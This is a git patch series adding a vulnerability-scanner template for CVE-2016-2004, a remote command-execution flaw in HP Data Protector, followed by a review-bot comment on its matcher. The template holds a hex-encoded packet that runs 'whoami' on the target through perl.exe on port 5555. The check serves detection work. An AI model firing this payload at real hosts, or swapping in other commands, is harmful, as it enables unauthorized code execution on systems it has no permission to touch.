From ac814bc151dddaec0ed8ffae4f77b1e4b38d5077 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 25 Jul 2021 02:11:44 +0530
Subject: [PATCH 1/3] Add files via upload
---
network/CVE-2016-2004.yaml | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
create mode 100644 network/CVE-2016-2004.yaml
diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml
new file mode 100644
index 0000000000..e024780180
--- /dev/null
+++ b/network/CVE-2016-2004.yaml
@@ -0,0 +1,19 @@
+id: CVE-2016-2004
+info:
+ name: HP Data Protector A.09.00 - Arbitrary Command Execution
+ author: pussycat0x
+ severity: critical
+ tags: network,iot,hp
+ description: Arbitrary Command Execution on HP Data Protector
+ reference: https://www.exploit-db.com/exploits/39858
+network:
+ - inputs:
+ - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900"
+ type: hex
+ host:
+ - "{{Hostname}}:5555"
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"
\ No newline at end of file
From a9fdbe851e5ecb837185917a9eed9320188285b9 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 25 Jul 2021 02:19:36 +0530
Subject: [PATCH 2/3] Update CVE-2016-2004.yaml
---
network/CVE-2016-2004.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml
index e024780180..5eef2aeb61 100644
--- a/network/CVE-2016-2004.yaml
+++ b/network/CVE-2016-2004.yaml
@@ -14,6 +14,6 @@ network:
 - "{{Hostname}}:5555"
 matchers:
 - type: word
- encoding: hex
+ encoding: hex
 words:
- - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"
\ No newline at end of file
+ - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"
From 4658f7ffcca0515e48042302629e6776ff7d894c Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sun, 25 Jul 2021 22:11:36 +0530
Subject: [PATCH 3/3] moving files around
---
cves/2016/CVE-2016-2004.yaml | 25 +++++++++++++++++++++++++
network/CVE-2016-2004.yaml | 19 -------------------
2 files changed, 25 insertions(+), 19 deletions(-)
create mode 100644 cves/2016/CVE-2016-2004.yaml
delete mode 100644 network/CVE-2016-2004.yaml
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
new file mode 100644
index 0000000000..41a2a7d60f
--- /dev/null
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -0,0 +1,25 @@
+id: CVE-2016-2004
+
+info:
+ name: HP Data Protector A.09.00 - Arbitrary Command Execution
+ author: pussycat0x
+ severity: critical
+ tags: cve,cve2016,network,iot,hp,rce
+ description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
+ reference: |
+ - https://www.exploit-db.com/exploits/39858
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+
+network:
+ - inputs:
+ - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
+ type: hex
+
+ host:
+ - "{{Hostname}}:5555"
+
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
\ No newline at end of file
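Review bot: The single `words` matcher at the end of the new `cves/2016/CVE-2016-2004.yaml` pins the entire reply, length prefix included, to the UTF-16LE text ` nt authority\system`, so a vulnerable service running under any other account would presumably produce no match and be reported as clean. That limit matters to anyone reading a negative result as "patched", and the trailing comment `# authority\system` drops the `nt ` part of what the bytes decode to; I would put `# matches only when whoami returned NT AUTHORITY\SYSTEM; no match does not prove the host is patched` above `matchers:`. The `description` should also say that the check runs `whoami` on the scanned host (per the comment on `data`) rather than fingerprinting the service. The file again ends without a newline, which PATCH 2/3 had just fixed at the old path, and the same matcher first appears in PATCH 1/3.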
diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml
deleted file mode 100644
index 5eef2aeb61..0000000000
--- a/network/CVE-2016-2004.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2016-2004
-info:
- name: HP Data Protector A.09.00 - Arbitrary Command Execution
- author: pussycat0x
- severity: critical
- tags: network,iot,hp
- description: Arbitrary Command Execution on HP Data Protector
- reference: https://www.exploit-db.com/exploits/39858
-network:
- - inputs:
- - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900"
- type: hex
- host:
- - "{{Hostname}}:5555"
- matchers:
- - type: word
- encoding: hex
- words:
- - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"